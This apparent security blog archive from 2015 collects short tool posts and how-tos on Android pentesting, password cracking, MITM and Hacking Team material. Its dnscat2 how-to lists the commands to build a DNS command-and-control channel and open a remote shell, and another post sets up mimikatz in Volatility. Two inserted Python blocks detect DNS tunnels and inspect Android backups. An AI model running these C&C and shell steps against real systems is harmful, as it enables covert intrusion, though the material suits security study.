Jul 10, 2015

Howto: Mobile penetration testing on Android using Drozer

Mobile phones have become an indispensable part of our daily life. We use mobile phones to communicate with our loved ones, for quick access to information through the Internet, to make transactions through mobile banking apps or to relax reading a good book. In a way, a big part of our private life has moved into the digital environment. Mobile phones seem to be a pocket-sized treasure of secrets and information, hiding our most valuable photos, mails, contacts and even banking information. There’s no wonder why we need mobile phones to have bullet-proof security.
Android is the most common operating system for mobile devices and is particularly interesting from the security point of view. It is very permissive, allowing its users to customize just about anything; administrative privileges (a.k.a. rooting) can be unlocked on most phones; it has a very fuzzy system for the permissions required by applications; and it features different ways for one application to interact with other applications.

Source::  http://securitycafe.ro/2015/07/08/mobile-penetration-testing-using-drozer/

Howto: Use dnscat2 to connect to a C&C server

Server side
1. Download dnscat2 from https://github.com/iagox86/dnscat2
# git clone https://github.com/iagox86/dnscat2

2. Install dnscat2
# cd dnscat2/server
# apt-get install ruby-dev build-essential
# gem install bundler
# gem install eventmachine -v '1.0.3'
# bundler install

3. Start the server (with or without a domain)
# ruby dnscat2.rb <domain>
# ruby dnscat2.rb

Client side
4. Download dnscat2 from https://github.com/iagox86/dnscat2
# git clone https://github.com/iagox86/dnscat2

5. Compile client
# cd dnscat2/client
# make

6. Connect to the dnscat2 server (by domain or by IP)
# ./dnscat --host <domain>
# ./dnscat --host <IP>

Server side
7. List the sessions
dnscat2> sessions

8. Interact with a session
dnscat2> session -i <session_id>
dnscat2> session -i 51336

9. Create a shell
dnscat2> shell
dnscat2> sessions
dnscat2> session -i <id>
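
Seen from the defender's side, a dnscat2 session shows up as a stream of DNS queries whose names carry encoded data under one domain. The following is an added detection example, not part of the original post or of dnscat2; the log format, the domain names, the hex-label pattern and both thresholds are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Assumption: a label of 16+ hex characters is treated as encoded payload.
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")

SAMPLE_LOG = [  # constructed lines, hypothetical "<time> <client> <qtype> <qname>" format
    "10:00:01 10.0.0.5 TXT 5f3a01c2000000004e6f7420.tunnel.example",
    "10:00:02 10.0.0.5 TXT 5f3a01c20001000061207265.tunnel.example",
    "10:00:03 10.0.0.5 CNAME 5f3a01c200020000616c2073.tunnel.example",
    "10:00:04 10.0.0.5 MX 5f3a01c20003000065737369.tunnel.example",
    "10:00:05 10.0.0.5 TXT 5f3a01c2000400006f6e2e2e.tunnel.example",
    "10:00:06 10.0.0.5 TXT 5f3a01c200050000636f6e73.tunnel.example",
    "10:00:02 10.0.0.7 A www.example.org",
    "10:00:03 10.0.0.7 AAAA mail.example.org",
    "10:00:04 10.0.0.8 A cdn.example.org",
    "malformed line",
]

def base_domain(qname, depth=2):
    """Last `depth` labels of the name (simplification: no public-suffix list)."""
    return ".".join(qname.rstrip(".").lower().split(".")[-depth:])

def has_hex_label(qname, depth=2):
    """True if any label left of the base domain looks like hex-encoded data."""
    labels = qname.rstrip(".").lower().split(".")[:-depth]
    return any(HEX_LABEL.match(label) for label in labels)

def flag_tunnel_domains(log_lines, min_unique=5, min_hex_ratio=0.8):
    """Group queries by base domain and flag those dominated by unique hex names."""
    names = defaultdict(set)
    for line in log_lines:
        fields = line.split()
        if len(fields) != 4:
            continue  # skip lines that do not parse
        names[base_domain(fields[3])].add(fields[3].lower().rstrip("."))
    flagged = {}
    for domain, qnames in names.items():
        ratio = sum(has_hex_label(q) for q in qnames) / len(qnames)
        if len(qnames) >= min_unique and ratio >= min_hex_ratio:
            flagged[domain] = {"unique_names": len(qnames), "hex_ratio": round(ratio, 2)}
    return flagged

if __name__ == "__main__":
    print(flag_tunnel_domains(SAMPLE_LOG))
```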

Tools: Teampass - Collaborative Passwords Manager

Teampass is a Collaborative Passwords Manager

Source:: https://github.com/nilsteampassnet/TeamPass

Jul 9, 2015

Tools: theWind - MITM Tool

A MITM attack tool.
It aims to perform man-in-the-middle attacks on multiple application-layer protocols. For now, it only supports the SSL protocol.

Source:: https://github.com/liuhui0613/TheWind

Tools: Hacking-Team-Sweeper - Tools to help detect Hacking Team malware

Hacking Team has developed a large amount of malware that is being used to target activists around the world. A hacker has recently released a 400+ GB data dump of internal HackingTeam source code. Currently there is a possibility that HT clients are attempting to wipe traces off their victims' computers. We need your aid to help preserve evidence. If you have technical skills we urge you to contribute; time is of the essence.

Source:: https://github.com/0xPoly/Hacking-Team-Sweeper

Tools: ADB Backup APK Injection

The Android operating system offers a backup/restore mechanism of installed packages through the ADB utility. By default, full backup of applications including the private files stored in /data is performed, but this behaviour can be customized by implementing a BackupAgent class. This way applications can feed the backup process with custom files and data. The backup file created is a simple compressed tar archive with some Android specific headers. Optional encryption is also possible.

Source:: https://github.com/irsl/ADB-Backup-APK-Injection/
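
The backup format described above (text header lines followed by a compressed tar stream) can be inspected before a restore. This is an added example, not code from the linked project; the package name and file contents in the sample are constructed, and encrypted backups are rejected rather than decrypted.

```python
import io
import tarfile
import zlib

MAGIC = b"ANDROID BACKUP"

def parse_header(blob):
    """Split the four text header lines from the payload that follows them."""
    parts = blob.split(b"\n", 4)
    if len(parts) < 5 or parts[0] != MAGIC:
        raise ValueError("not an Android backup file")
    header = {"version": int(parts[1]), "compressed": parts[2] == b"1",
              "encryption": parts[3].decode("ascii")}
    return header, parts[4]

def list_entries(blob):
    """List tar members of an unencrypted backup without extracting them."""
    header, payload = parse_header(blob)
    if header["encryption"] != "none":
        raise ValueError("encrypted backup: decryption is not handled here")
    if header["compressed"]:
        payload = zlib.decompress(payload)
    with tarfile.open(fileobj=io.BytesIO(payload), mode="r:") as tar:
        return header, [(m.name, m.size) for m in tar.getmembers()]

def find_apks(entries):
    """Entries that carry an APK and deserve review before a restore."""
    return [name for name, _ in entries if name.lower().endswith(".apk")]

def build_sample():
    """Constructed sample backup (hypothetical package name and contents)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in [
            ("apps/com.example.notes/_manifest", b"1\ncom.example.notes\n"),
            ("apps/com.example.notes/a/base.apk", b"PK\x03\x04constructed"),
            ("apps/com.example.notes/sp/prefs.xml", b"<map/>"),
        ]:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return MAGIC + b"\n1\n1\nnone\n" + zlib.compress(buf.getvalue())

if __name__ == "__main__":
    hdr, entries = list_entries(build_sample())
    print(hdr, find_apks(entries))
```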

Tools: Johnny - John the Ripper GUI

Johnny is a cross-platform open-source GUI for the popular password cracker John the Ripper. It was proposed by Shinnok.

Source:: http://openwall.info/wiki/john/johnny

Jul 8, 2015

Howto: Install syslog-ng in Ubuntu 14.04

1. Install required software and export PKG_CONFIG_PATH
# apt-get install pkg-config libperl-dev libgtk2.0-dev
# export PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/usr/local/lib/pkgconfig

2. Download and build the eventlog source
# wget "https://my.balabit.com/downloads/eventlog/0.2/eventlog_0.2.12.tar.gz"
# tar xzvf eventlog_0.2.12.tar.gz
# cd eventlog-0.2.12
# ./configure && make && make install
# cd ..

3. Download and build the syslog-ng source
# wget "http://my.balabit.com/downloads/syslog-ng/open-source-edition/3.6.4/source/syslog-ng_3.6.4.tar.gz"
# tar xzvf syslog-ng_3.6.4.tar.gz
# cd syslog-ng-3.6.4
# ./configure && make && make install

4. Install the startup script (you must change the path of syslog-ng in syslog-ng.init)
# cp debian/syslog-ng.init /etc/init.d/syslog-ng
# chmod +x /etc/init.d/syslog-ng

5. Reload the shared library cache
# ldconfig -v

6. Try to use syslog-ng
# /etc/init.d/syslog-ng start

Jul 7, 2015

VDO: Demo MS09-001 that leaked from HackingTeam

Source:: http://sprunge.us/dSDQ

Howto: install mimikatz into Volatility plugin

1. Download mimikatz
# wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py

2. Copy it to the volatility plugin folder
# cp mimikatz.py /usr/share/pyshared/volatility/plugins/
# cp mimikatz.py /usr/lib/python2.7/dist-packages/volatility/plugins/

3. Try to use it
# volatility -f <file_name>.vmem --profile=<Known_Profile_of_Image> mimikatz

Tools: Sentry - Bruteforce attack blocker (ssh, FTP, SMTP, and more)

sentry - safe and effective protection against bruteforce attacks

Source:: https://github.com/msimerson/sentry